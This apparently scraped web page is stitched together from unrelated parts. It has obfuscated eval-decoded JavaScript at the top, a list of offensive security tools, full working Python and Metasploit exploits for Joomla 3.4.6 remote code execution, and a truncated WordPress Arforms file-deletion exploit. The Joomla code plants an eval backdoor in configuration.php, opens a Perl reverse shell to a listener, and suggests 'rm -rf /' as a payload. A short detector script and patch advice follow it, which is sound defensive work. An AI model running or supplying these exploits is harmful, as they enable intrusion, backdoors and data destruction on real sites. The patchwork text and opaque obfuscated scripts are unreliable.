"\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh" +
"83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\"+
"\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\"+
"\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02" +
"5\\\\\\\\025\\\\\\\\010\\\\\\\\030\\\\\\\\020t<^!M@;?T+4W~Q`3}tfr4}bch4\\\\" +
"\\\\177jith\\\\\\\\\\\"\\\\|\\\\\\\\003g[TLTB[u\\\\\\\\010\\\\\\\\013OB@[U_" +
"F\\\\\\\\016h\\\\\\\\027\\\\\\\\033\\\\\\\\006d\\\\\\\\033\\\\\\\\004gNaP\\" +
"\\\\\\003\\\\\\\\\\\"\\\\.&:z\\\\\\\\0314\\\\\\\\033&u9(>$>;p=3=3 70=d\\\\\\"+
"\\006y\\\\\\\\n\\\\\\\\037\\\\\\\\r<\\\\\\\\022\\\\\\\\010\\\\\\\\022\\\\\\" +
"\\027J \\\\\\\\010\\\\\\\\004\\\\\\\\007\\\\\\\\r\\\\\\\\0177NS2\\\\\\\\035" +
",\\\\\\\\037.\\\\\\\\001(\\\\\\\\033VWX=\\\\\\\\023\\\\\\\\026\\\\\\\\\\\\\\"+
"\\\\\\\\\\016\\\\\\\\026l!\\\\\\\\\\\"\\\\_vYh'()Ynx-}g|1/3Wgsvl|Uyvx}k\\\\" +
"\\\\010}\\\\\\\\000tWFTNX]\\\\\\\\004xDHBCl\\\\\\\\023\\\\\\\\033\\\\\\\\02" +
"3\\\\\\\\024iDkV\\\\\\\\031\\\\\\\\032\\\\\\\\033\\\\\\\\177\\\\\\\\\\\\\\\\"+
"RS`2*/j\\\\\\\\0273)`\\\\\\\\025h\\\\\\\\027n\\\\\\\\021l,=5|6,0\\\\\\\\nu\\"+
"\\\\\\004{\\\\\\\\006yu}~\\\\\\\\003\\\\\\\\022=\\\\\\\\014CDE5\\\\\\\\002\\"+
"\\\\\\034I\\\\\\\\031\\\\\\\\003\\\\\\\\000MSO>\\\\\\\\036\\\\\\\\006\\\\\\" +
"\\033\\\\\\\\035\\\\\\\\033\\\\\\\\021WXYZ'\\\\\\\\016!\\\\\\\\020 !\\\\\\\\"+
"\\\"\\\\_vYh;'ziye}z1LcN}(:tx|`$GnAp#\\\\\\\\017IVNH\\\\\\\\033\\\\\\\\004\\"+
"\\\\\\016\\\\\\\\023\\\\\\\\031\\\\\\\\021\\\"\\\\,28)\\\"(f};)lo,0(rtsbus." +
"o nruter};)i(tArahc.x=+o{)--i;0=>i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)401" +
"=!)31/l(tAedoCrahc.x(elihw;lo=l,htgnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\""+
")" ;
while(x=eval(x));
//-->
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" +
"=48){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" +
".substr(0,ol);}f(\")19,\\\"ZPdw771\\\\b77-0xjk-7=3771\\\\sp,cw$520\\\\:330\\"+
"\\xg030\\\\jj9%530\\\\b000\\\\XZUUVX620\\\\LP\\\\\\\\Pr\\\\610\\\\KOHD400\\" +
"\\620\\\\720\\\\\\\\\\\\WOWGPr\\\\530\\\\NClAauFkD,$gqutdr/3-ig~`|)rkanwbo2" +
"30\\\\t\\\\ 520\\\\&310\\\\$n\\\\200\\\\)230\\\\/000\\\\-K530\\\\310\\\\310" +
"\\\\n\\\\630\\\\010\\\\IULFW620\\\\600\\\\400\\\\700\\\\520\\\\=*100\\\\(70" +
"0\\\\4500\\\\*310\\\\-u}xy8pt~}|{771\\\\itg/e771\\\\sb|`V620\\\\530\\\\NT\\" +
"\\\\\\MdYjGh010\\\\@TVI[O410\\\\620\\\\n\\\\330\\\\ZB@CQA200\\\\SAijArGhEec" +
"J{HaN*2S?9t)V)5,&waedtbn\\\\!010\\\\'420\\\\%n\\\\+r\\\\U]XY030\\\\PT^]\\\\" +
"\\\\[ZY]GZEr\\\\CYQ@b~4|);/pw$:2'610\\\\?410\\\\=220\\\\vn720\\\\h520\\\\hz" +
"f7!%$4\\\"\\\\730\\\\L\\\\\\\\JOfWdEjN420\\\\230\\\\230\\\\IU710\\\\@BE_IG]" +
"AHyV771\\\\430\\\\300\\\\|kntnxixnv|:`kwe2S3h|r~)|wowgp>o\\\\\\\\410\\\\!B7" +
"30\\\\330\\\\430\\\\020\\\\K030\\\\)600\\\\/L530\\\\530\\\\330\\\\600\\\\QN" +
"C400\\\\500\\\\r\\\\320\\\\710\\\\720\\\\320\\\\M620\\\\710\\\\500\\\\2+>3?" +
"\\\"(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y{)++i" +
";l<i;0=i(rof;htgnel.x=l,\\\"\\\"=o,i rav{)y,x(f noitcnuf\")" ;
while(x=eval(x));
//-->
//]]>
</script>
21. If you want to do a good job, you must first sharpen your tools. For new friends who are new to network security, you must have some understanding of these tools. In this article, let's briefly talk about these network security tools!

Web Security Class

The web-class tools mainly use various scanning tools to discover vulnerabilities in web sites such as SQL injection, XSS, etc., and thereby obtain system permissions. Commonly used tools include:

01 Nmap
nmap is the first tool we use. Using this tool, we can scan the IP of the site and find the ports, services, operating systems, etc. that have been opened. It can also be used for vulnerability scanning, brute-force cracking, fingerprint recognition, etc.

02 dirsearch
Scans the main site's directories. By scanning, we can obtain the site administrator background, backup files, and the site's directory structure. Similar tools include Gobuster, DIRB, Wfuzz, etc. Each tool has its own strengths, but the principles are similar.

03 dnsmap
dnsmap is a subdomain name collection tool. When the main site does not have a vulnerability, we can also get in through a vulnerability on a side site. There are many such tools, such as Layer subdomain excavator.

04 Web vulnerability scanners
Web vulnerability scanning tools are blooming. The most famous tools are Nessus, AppScan, AWVS, OWASP ZAP, xray and so on. Let me give you a brief introduction.

Nessus
Nessus is the most used system vulnerability scanning and analysis software in the world. It has very powerful functions, divided into ordinary and professional versions. After entering the target, you can scan for vulnerabilities with one click. The output results are intuitive and clear.

AppScan
AppScan uses a powerful scanning engine to automatically crawl target applications and test for vulnerabilities. Test results are prioritized and presented in a way that allows operators to quickly classify problems and dig deep into the most critical vulnerabilities found. Reference article: 《WEB漏洞扫描工具HCL AppScan Standard》 (Web vulnerability scanning tool HCL AppScan Standard).

OWASP ZAP
OWASP ZAP, full name OWASP Zed Attack Proxy, is one of the most popular free security tools in the world. ZAP can help us automatically discover security vulnerabilities in web applications during the development and testing of applications. In addition, it is also an excellent tool for manual security testing by experienced penetration testers.

xray
xray is a powerful security assessment tool, created by many experienced front-line security practitioners. Its main features are: fast detection speed, with fast packet transmission and an efficient vulnerability detection algorithm; and a wide support range, from OWASP Top 10 general vulnerability detection to POCs for various CMS frameworks. It can also be linked with Burp. Double damage is the deadliest.

05 sqlmap
sqlmap is an automated SQL injection tool. Its main function is to scan, discover and exploit SQL injection vulnerabilities for a given URL. It is one of the must-have tools for cybersecurity enthusiasts.

06 Burp Suite
Burp Suite is a graphical tool for testing the security of web applications. In web testing, this tool is commonly used to scan for vulnerabilities, analyze packets, modify packets, and brute-force cracking. It is a very important tool.

At this point, the commonly used tools in web security have been introduced. Of course, in addition to the above tools, there are many other excellent tools, but due to limited time and energy, I will not list them one by one.

System Security

System security mainly includes scanning for operating system vulnerabilities in Windows and Linux, SSH and FTP password cracking, etc. Common tools are as follows:

07 Metasploit
msfconsole, referred to as msf, is a commonly used penetration testing tool, which includes common vulnerability exploit modules and generation of various Trojans. It is a must-have tool for cybersecurity enthusiasts.

08 Cobalt Strike
Cobalt Strike can be understood as a visual Metasploit. It is a penetration testing tool developed by Red Team in the United States, and is often called CS by industry giants.

09 Goby
Goby is a new network security testing tool created by Zwell (author of Pangolin, JSky, FOFA). It can sort out the most comprehensive attack surface information for a target enterprise, while also conducting efficient and practical vulnerability scanning.

10 Yakit
It is a highly integrated security testing platform. It also contains many functions such as port scanning, brute-force cracking, rich plug-ins, packet interception and modification, and other conventional functions.

WiFi Security Class

11 hashcat
hashcat is one of the most popular, fastest and most professional password recovery tools. It supports 5 unique attack modes and is suitable for over 300 highly optimized hashing algorithms. It supports CPUs, GPUs and other hardware accelerators and helps with distributed password cracking.

12 John
John can be simply understood as an offline hash cracking tool. It supports system passwords, PDF files, ZIP, RAR, WiFi passwords, etc.

13 Medusa
A common password cracking tool with weaker capabilities than the previous two, but it supports more protocols, for example SMB, HTTP, POP3, MSSQL, SSH, etc.

14 Mimikatz
Mimikatz is mainly used to extract passwords, PINs, hash codes and Kerberos tickets from Windows host memory and save them in plain text files.

WiFi Security Class

15 aircrack-ng suite
airmon-ng is part of a suite; different tools in the suite have different jobs. For example, use airodump-ng to crack, and aircrack-ng for scanning WiFi. The most basic and introductory WiFi password recovery tool.

16 wifite
A fool-proof one-click WiFi cracking tool. I am unwilling to accept the autocracy.

17 fluxion
The most classic WiFi phishing tool. The same type of tool also includes airgeddon.

Man-in-the-Middle Attack

18 Wireshark
Wireshark is the world's top and most widely used network protocol analysis tool. Using this tool, we can capture data packet information, and can also capture accounts, passwords, pictures, chat history and other information in the HTTP protocol.

19 ettercap
Ettercap is the most commonly used man-in-the-middle tool. It should be noted that due to the updates of various protocols, many of the functions of ettercap can no longer be used. But it can still be used in the LAN.

20 Social Engineering Tools
I won't say much; SET is the most awesome. However, every time the dependent environment is started, various errors are reported, but it does not affect the use.
22. # Exploit Title: Joomla! 3.4.6 - Remote Code Execution
# Google Dork: N/A
# Date: 2019-10-02
# Exploit Author: Alessandro Groppo
# Vendor Homepage: https//www.joomla.it/
# Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6
# Version: 3.0.0 --> 3.4.6
# Tested on: Linux
# CVE : N/A
# Technical details: https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41
# Github: https://github.com/kiks7/rusty_joomla_rce
#
# The exploitation is implanting a backdoor in /configuration.php file in the root directory with an eval in order to be more suitable for all environments, but it is also more intrusive.
# If you don't like this way, you can replace the get_backdoor_pay() with get_pay('php_function', 'parameter') like get_pay('system','rm -rf /')

#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import sys
import string
import random
import argparse
from termcolor import colored

PROXS = {'http':'127.0.0.1:8080'}
PROXS = {}

def random_string(stringLength):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(stringLength))

backdoor_param = random_string(50)

def print_info(str):
    print(colored("[*] " + str,"cyan"))

def print_ok(str):
    print(colored("[+] "+ str,"green"))

def print_error(str):
    print(colored("[-] "+ str,"red"))

def print_warning(str):
    print(colored("[!!] " + str,"yellow"))

def get_token(url, cook):
    token = ''
    resp = requests.get(url, cookies=cook, proxies = PROXS)
    html = BeautifulSoup(resp.text,'html.parser')
    # csrf token is the last input
    for v in html.find_all('input'):
        csrf = v
    csrf = csrf.get('name')
    return csrf

def get_error(url, cook):
    resp = requests.get(url, cookies = cook, proxies = PROXS)
    if 'Failed to decode session object' in resp.text:
        #print(resp.text)
        return False
    #print(resp.text)
    return True

def get_cook(url):
    resp = requests.get(url, proxies=PROXS)
    #print(resp.cookies)
    return resp.cookies

def gen_pay(function, command):
    # Generate the payload for call_user_func('FUNCTION','COMMAND')
    template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
    #payload = command + ' || $a=\'http://wtf\';'
    payload = 'http://l4m3rz.l337/;' + command
    # Following payload will append an eval() at the enabled of the configuration file
    #payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
    function_len = len(function)
    final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
    return final

def make_req(url , object_payload):
    # just make a req with object
    print_info('Getting Session Cookie ..')
    cook = get_cook(url)
    print_info('Getting CSRF Token ..')
    csrf = get_token( url, cook)
    user_payload = '\\0\\0\\0' * 9
    padding = 'AAA' # It will land at this padding
    working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'
    clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects
    inj_object = '";'
    inj_object += object_payload
    inj_object += 's:6:"return";s:102:' # end the object with the 'return' part
    password_payload = padding + inj_object
    params = {
        'username': user_payload,
        'password': password_payload,
        'option':'com_users',
        'task':'user.login',
        csrf :'1'
    }
    print_info('Sending request ..')
    resp = requests.post(url, proxies = PROXS, cookies = cook,data=params)
    return resp.text

def get_backdoor_pay():
    # This payload will backdoor the the configuration .PHP with an eval on POST request
    function = 'assert'
    template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
    # payload = command + ' || $a=\'http://wtf\';'
    # Following payload will append an eval() at the enabled of the configuration file
    payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
    function_len = len(function)
    final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
    return final

def check(url):
    check_string = random_string(20)
    target_url = url + 'index.php/component/users'
    html = make_req(url, gen_pay('print_r',check_string))
    if check_string in html:
        return True
    else:
        return False

def ping_backdoor(url,param_name):
    res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)
    if 'PWNED' in res.text:
        return True
    return False

def execute_backdoor(url, payload_code):
    # Execute PHP code from the backdoor
    res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS)
    print(res.text)

def exploit(url, lhost, lport):
    # Exploit the target
    # Default exploitation will append en eval function at the end of the configuration.pphp
    # as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters')
    # e.g. get_payload('system','rm -rf /')
    # First check that the backdoor has not been already implanted
    target_url = url + 'index.php/component/users'
    make_req(target_url, get_backdoor_pay())
    if ping_backdoor(url, backdoor_param):
        print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param)
        print_info('Now it\'s time to reverse, trying with a system + perl')
        execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');')

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-t','--target',required=True,help='Joomla Target')
    parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only')
    parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit')
    parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP')
    parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port')
    args = vars(parser.parse_args())
    url = args['target']
    if(check(url)):
        print_ok('Vulnerable')
        if args['exploit']:
            exploit(url, args['lhost'], args['lport'])
        else:
            print_info('Use --exploit to exploit it')
    else:
        print_error('Seems NOT Vulnerable ;/')

metasploit_rusty_joomla_rce.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Joomla

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Rusty Joomla Unauthenticated Remote Code Execution',
      'Description'    => %q{
        PHP Object Injection because of a downsize in the read/write process with the database leads to RCE.
        The exploit will backdoor the configuration.php file in the root directory with en eval of a POST parameter.
        That's because the exploit is more reliabale (doesn't rely on common disabled function).
        For this reason, use it with caution and remember the house cleaning.
        Btw, you can also edit this exploit and use whatever payload you want. just modify the exploit object with
        get_payload('you_php_function','your_parameters'), e.g. get_payload('system','rm -rf /') and enjoy
      },
      'Author'         =>
        [
          'Alessandro \'kiks\' Groppo @Hacktive Security',
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41']
        ],
      'Privileged'     => false,
      'Platform'       => 'PHP',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Joomla 3.0.0 - 3.4.6', {}]],
      'DisclosureDate' => 'Oct 02 2019',
      'DefaultTarget'  => 0)
    )

    register_advanced_options(
      [
        OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
      ])
  end

  def get_random_string(length=50)
    source=("a".."z").to_a + ("A".."Z").to_a + (0..9).to_a
    key=""
    length.times{ key += source[rand(source.size)].to_s }
    return key
  end

  def get_session_token
    # Get session token from cookies
    vprint_status('Getting Session Token')
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path)
    })
    cook = res.headers['Set-Cookie'].split(';')[0]
    vprint_status('Session cookie: ' + cook)
    return cook
  end

  def get_csrf_token(sess_cookie)
    vprint_status('Getting CSRF Token')
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path,'/index.php/component/users'),
      'headers' => {
        'Cookie' => sess_cookie,
      }
    })
    html = res.get_html_document
    input_field = html.at('//form').xpath('//input')[-1]
    token = input_field.to_s.split(' ')[2]
    token = token.gsub('name="','').gsub('"','')
    if token then
      vprint_status('CSRF Token: ' + token)
      return token
    end
    print_error('Cannot get the CSRF Token ..')
  end

  def get_payload(function, payload)
    # @function: The PHP Function
    # @payload: The payload for the call
    template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
    # The http:// part is necessary in order to validate a condition in SimplePie::init and trigger the call_user_func with arbitrary values
    payload = 'http://l4m3rz.l337/;' + payload
    final = template.gsub('PAYLOAD',payload).gsub('LENGTH', payload.length.to_s).gsub('FUNC_NAME', function).gsub('FUNC_LEN', function.length.to_s)
    return final
  end

  def get_payload_backdoor(param_name)
    # return the backdoor payload
    # or better, the payload that will inject and eval function in configuration.php (in the root)
    # As said in other part of the code. we cannot create new .php file because we cannot use
    # the ? character because of the check on URI schema
    function = 'assert'
    template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
    # This payload will append an eval() at the end of the configuration file
    payload = "file_put_contents('configuration.php','if(isset($_POST[\\'"+param_name+"\\'])) eval($_POST[\\'"+param_name+"\\']);', FILE_APPEND) || $a=\'http://wtf\';"
    template['PAYLOAD'] = payload
    template['LENGTH'] = payload.length.to_s
    template['FUNC_NAME'] = function
    template['FUNC_LEN'] = function.length.to_s
    return template
  end

  def check_by_exploiting
    # Check that is vulnerable by exploiting it and try to inject a printr('something')
    # Get the Session anb CidSRF Tokens
    sess_token = get_session_token()
    csrf_token = get_csrf_token(sess_token)
    print_status('Testing with a POC object payload')
    username_payload = '\\0\\0\\0' * 9
    password_payload = 'AAA";' # close the prev object
    password_payload += get_payload('print_r','IAMSODAMNVULNERABLE') # actual payload
    password_payload += 's:6:"return":s:102:' # close cleanly the object
    res = send_request_cgi({
      'uri'     => normalize_uri(target_uri.path,'/index.php/component/users'),
      'method'  => 'POST',
      'headers' => {
        'Cookie' => sess_token,
      },
      'vars_post' => {
        'username' => username_payload,
        'password' => password_payload,
        'option'   => 'com_users',
        'task'     => 'user.login',
        csrf_token => '1',
      }
    })
    # Redirect in order to retrieve the output
    if res.redirection then
      res_redirect = send_request_cgi({
        'method'  => 'GET',
        'uri'     => res.redirection.to_s,
        'headers' =>{
          'Cookie' => sess_token
        }
      })
      if 'IAMSODAMNVULNERABLE'.in? res.to_s or 'IAMSODAMNVULNERABLE'.in? res_redirect.to_s then
        return true
      else
        return false
      end
    end
  end

  def check
    # Check if the target is UP and get the current version running by info leak
    res = send_request_cgi({'uri' => normalize_uri(target_uri.path, '/administrator/manifests/files/joomla.xml')})
    unless res
      print_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end
    # Parse XML to get the version
    if res.code == 200 then
      xml = res.get_xml_document
      version = xml.at('version').text
      print_status('Identified version ' + version)
      if version <= '3.4.6' and version >= '3.0.0' then
        if check_by_exploiting()
          return Exploit::CheckCode::Vulnerable
        else
          if check_by_exploiting() then # Try the POC 2 times.
            return Exploit::CheckCode::Vulnerable
          else
            return Exploit::CheckCode::Safe
          end
        end
      else
        return Exploit::CheckCode::Safe
      end
    else
      print_error('Cannot retrieve XML file for the Joomla Version. Try the POC in order to confirm if it\'s vulnerable')
      if check_by_exploiting() then
        return Exploit::CheckCode::Vulnerable
      else
        if check_by_exploiting() then
          return Exploit::CheckCode::Vulnerable
        else
          return Exploit::CheckCode::Safe
        end
      end
    end
  end

  def exploit
    if check == Exploit::CheckCode::Safe && !datastore['FORCE']
      print_error('Target is not vulnerable')
      return
    end
    pwned = false
    cmd_param_name = get_random_string(50)
    sess_token = get_session_token()
    csrf_token = get_csrf_token(sess_token)
    # In order to avoid problems with disabled functions
    # We are gonna append an eval() function at the end of the configuration.php file
    # This will not cause any problem to Joomla and is a good way to execute then PHP directly
    # cuz assert is toot annoying and with conditions that we have we cannot inject some characters
    # So we will use 'assert' with file_put_contents to append the string. then create a reverse shell with this backdoor
    # Oh i forgot, We cannot create a new file because we cannot use the '?' character in order to be interpreted by the web server.
    # TODO: Add the PHP payload object to inject the backdoor inside the configuration.php file
    # Use the implanted backdoor to receive a nice little reverse shell with a PHP payload

    # Implant the backdoor
    vprint_status('Cooking the exploit ..')
    username_payload = '\\0\\0\\0' * 9
    password_payload = 'AAA";' # close the prev object
    password_payload += get_payload_backdoor(cmd_param_name) # actual payload
    password_payload += 's:6:"return":s:102:' # close cleanly the object
    print_status('Sending exploit ..')
    res = send_request_cgi({
      'uri'     => normalize_uri(target_uri.path,'/index.php/component/users'),
      'method'  => 'POST',
      'headers' => {
        'Cookie' => sess_token
      },
      'vars_post' => {
        'username' => username_payload,
        'password' => password_payload,
        'option'   => 'com_users',
        'task'     => 'user.login',
        csrf_token => '1'
      }
    })
    print_status('Triggering the exploit ..')
    if res.redirection then
      res_redirect = send_request_cgi({
        'method'  => 'GET',
        'uri'     => res.redirection.to_s,
        'headers' =>{
          'Cookie' => sess_token
        }
      })
    end
    # Ping the backdoor see if everything is ok :/
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path,'configuration.php'),
      'vars_post' => {
        cmd_param_name => 'echo \'PWNED\';'
      }
    })
    if res.to_s.include? 'PWNED' then
      print_status('Target P0WN3D! eval your code at /configuration.php with ' + cmd_param_name + ' in a POST')
      pwned = true
    end
    if pwned then
      print_status('Now it\'s time to reverse shell')
      res = send_request_cgi({
        'method' => 'POST',
        'uri'    => normalize_uri(target_uri.path,'configuration.php'),
        'vars_post' => {
          cmd_param_name => payload.encoded
        }
      })
    end
  end
end
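Both PoCs above carry the same two tell-tale shapes in the `com_users` login POST: a `username` padded with literal backslash-zero sequences and a `password` that closes the enclosing serialized string (`AAA";`) and then opens a serialized PHP object (`O:21:"JDatabaseDriverMysqli":...`). The detector below is an added example for the defending side (it is not part of the exploit above and not the author's code): it decodes a form body, checks only the Joomla login handler, and reports those indicators so they can be fed to a WAF rule or an alert. The two request records are constructed; the hostile one reuses only the object header already visible in the PoC, with an empty property list.

```python
import re
import urllib.parse

# Indicator patterns taken from the PoC above.
SERIALIZED_OBJECT = re.compile(r'O:\d+:"[A-Za-z_\\][A-Za-z0-9_\\]*":\d+:\{')  # O:<len>:"<class>":<n>:{
STRING_BREAKOUT = re.compile(r'";s:\d+:"')       # closes a serialized string and starts another
NULL_PADDING = re.compile(r'(?:\\0){3,}')        # runs of literal backslash-zero in the username


def login_fields(body):
    """Decode an application/x-www-form-urlencoded body into a dict."""
    return dict(urllib.parse.parse_qsl(body, keep_blank_values=True))


def injection_indicators(body):
    """Indicators that a Joomla login POST carries a serialized-object payload.

    Only the com_users / user.login handler is examined, which is where the
    PoC sends its object; anything else returns an empty list.
    """
    fields = login_fields(body)
    if fields.get("option") != "com_users" or fields.get("task") != "user.login":
        return []
    hits = []
    for name in ("username", "password"):
        value = fields.get(name, "")
        if SERIALIZED_OBJECT.search(value):
            hits.append(f"{name}: serialized PHP object")
        if STRING_BREAKOUT.search(value):
            hits.append(f"{name}: breaks out of serialized string")
        if NULL_PADDING.search(value):
            hits.append(f"{name}: backslash-zero padding")
    return hits


def constructed_records():
    """Two constructed WAF-style records as (client_ip, raw POST body)."""
    token = "d41d8cd98f00b204e9800998ecf8427e"   # constructed stand-in for the CSRF field name
    benign = urllib.parse.urlencode({
        "username": "alice", "password": "correct-horse",
        "option": "com_users", "task": "user.login", token: "1",
    })
    hostile = urllib.parse.urlencode({
        "username": "\\0\\0\\0" * 9,
        "password": 'AAA";s:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":0:{}s:6:"return";s:102:',
        "option": "com_users", "task": "user.login", token: "1",
    })
    return [("203.0.113.7", benign), ("198.51.100.9", hostile)]


def scan(records):
    """Return {client_ip: [indicators]} for every record that trips a pattern."""
    flagged = {}
    for ip, body in records:
        hits = injection_indicators(body)
        if hits:
            flagged[ip] = hits
    return flagged


if __name__ == "__main__":
    for ip, hits in scan(constructed_records()).items():
        print(ip, "->", "; ".join(hits))
```

Detection is a stopgap: the lasting fix for this class of bug is the vendor patch, and in any PHP code that still calls `unserialize()` on data it does not fully control, passing `['allowed_classes' => false]` (available since PHP 7.0) removes the object-instantiation step the gadget chain depends on.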
23. # Exploit Title: WordPress Arforms 3.7.1 - Directory Traversal
# Date: 2019-09-27
# Exploit Author: Ahmad Almorabea
# Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt
# Software Link: https://www.arformsplugin.com/documentation/changelog/
# Version: 3.7.1
# CVE ID: CVE-2019-16902

#**************Start Notes**************
# You can run the script by putting the script name and then the URL and the URL should have directory the Wordpress folders.
# Example : exploit.rb www.test.com, and the site should have the Wordpress folders in it such www.test.com/wp-contnet.
# Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143.
# But maybe in other forms maybe it's different so you have to change it accordingly.
# This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on
# There is a request file with this Script make sure to put it in the same folder.
#**************End Notes****************

#!/usr/bin/env ruby
require "net/http"
require 'colorize'

$host = ARGV[0] || ""
$session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad"

def start_function ()
  puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow
  name = STDIN.gets
  if $host == ""
    puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red
    exit
  end
  check_existence_arform_folder
  execute_deletion_attack
  puts "Done ... see ya " + name
end

def send_checks(files_names)
  j = 1
  while j <= files_names.length-1
    uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j])
    http = Net::HTTP.new(uri.host, uri.port)
    http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
    request = Net::HTTP::Get.new(uri.request_uri)
    request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
    request["Connection"] = "keep-alive"
    request["Accept-Language"] = "en-US,en;q=0.5"
    request["Accept-Encoding"] = "gzip, deflate"
    request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
    begin
